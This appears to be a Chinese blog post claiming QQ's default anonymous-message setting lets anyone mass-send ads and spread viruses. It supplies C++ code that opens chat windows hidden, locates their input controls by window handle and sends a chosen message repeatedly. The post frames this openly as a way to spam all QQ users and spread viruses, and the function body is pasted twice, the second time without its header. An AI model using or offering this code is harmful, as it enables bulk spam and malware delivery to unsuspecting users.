QQ存在重大漏洞,用户可以群发小广告,传播病毒
QQ允许发送匿名消息,虽然我们可以把它关掉,但默认是允许的,这就给人以可乘之机,这样我们可以利用它来给所有QQ用户群发小广告,传播病毒。
实现代码
实现代码
HRESULT CtestQQDlg::SendMsg(CString qqNum, CString msg)
{
CString str;
str.Format (_T ("Tencent://Message/?Menu=YES&Exe=QQ&Uin=%s"), qqNum);
ShellExecute (NULL, _T ("open"), str, NULL, NULL, SW_HIDE);
//寻找桌面上已打开的聊天窗口,然后对该窗口进行自动发送消息:
HWND hwnd1 = NULL;
HWND hwnd2 = NULL;
HWND hRichEdit = NULL;
//HWND hSendButton = NULL;
//尝试找到句柄,尝试10次,如果未找到
int testTimes = 10,testCount = 0;
while(g_hwnd == NULL && testCount < testTimes)
{
EnumWindows (EnumWindowsProc, NULL);
Sleep(500);
testCount++;
}
if (g_hwnd == NULL) //g_hwnd标识找到的聊天窗口
{
return S_FALSE;
}
do
{
if ((hwnd1 = ::FindWindowEx (g_hwnd, NULL, _T ("#32770"), NULL)) != NULL
&& GetWindowLong (hwnd1, GWL_STYLE) == 0x50000044)
break;
}while (hwnd1 != NULL);
if (hwnd1 == NULL)
return S_FALSE;
do
{
if ((hwnd2 = ::FindWindowEx (hwnd1, NULL, _T ("AfxWnd42"), NULL)) != NULL
&& (hRichEdit = ::GetDlgItem (hwnd2, 0x37e)) != NULL)
break;
}while (hwnd2 != NULL);
if (hwnd2 == NULL || hRichEdit == NULL)
return S_FALSE;
CHARRANGE r;
r.cpMax = -1;
r.cpMin = 0;
UpdateData (TRUE);
int times = atoi (m_sendTimes);
for (int i=0; i < times; i++)
{
::SendMessage (hRichEdit, EM_EXSETSEL, 0, (LPARAM) &r);
::SendMessage (hRichEdit, EM_REPLACESEL, 0, (LPARAM)(LPCTSTR)msg);
::SendMessage (hwnd1, WM_COMMAND, 1, NULL);
Sleep (1000);
}
::SendMessage (g_hwnd, WM_CLOSE, 0, NULL); // 最后可以选择关闭该窗口
return S_OK;
}
{
CString str;
str.Format (_T ("Tencent://Message/?Menu=YES&Exe=QQ&Uin=%s"), qqNum);
ShellExecute (NULL, _T ("open"), str, NULL, NULL, SW_HIDE);
//寻找桌面上已打开的聊天窗口,然后对该窗口进行自动发送消息:
HWND hwnd1 = NULL;
HWND hwnd2 = NULL;
HWND hRichEdit = NULL;
//HWND hSendButton = NULL;
//尝试找到句柄,尝试10次,如果未找到
int testTimes = 10,testCount = 0;
while(g_hwnd == NULL && testCount < testTimes)
{
EnumWindows (EnumWindowsProc, NULL);
Sleep(500);
testCount++;
}
if (g_hwnd == NULL) //g_hwnd标识找到的聊天窗口
{
return S_FALSE;
}
do
{
if ((hwnd1 = ::FindWindowEx (g_hwnd, NULL, _T ("#32770"), NULL)) != NULL
&& GetWindowLong (hwnd1, GWL_STYLE) == 0x50000044)
break;
}while (hwnd1 != NULL);
if (hwnd1 == NULL)
return S_FALSE;
do
{
if ((hwnd2 = ::FindWindowEx (hwnd1, NULL, _T ("AfxWnd42"), NULL)) != NULL
&& (hRichEdit = ::GetDlgItem (hwnd2, 0x37e)) != NULL)
break;
}while (hwnd2 != NULL);
if (hwnd2 == NULL || hRichEdit == NULL)
return S_FALSE;
CHARRANGE r;
r.cpMax = -1;
r.cpMin = 0;
UpdateData (TRUE);
int times = atoi (m_sendTimes);
for (int i=0; i < times; i++)
{
::SendMessage (hRichEdit, EM_EXSETSEL, 0, (LPARAM) &r);
::SendMessage (hRichEdit, EM_REPLACESEL, 0, (LPARAM)(LPCTSTR)msg);
::SendMessage (hwnd1, WM_COMMAND, 1, NULL);
Sleep (1000);
}
::SendMessage (g_hwnd, WM_CLOSE, 0, NULL); // 最后可以选择关闭该窗口
return S_OK;
}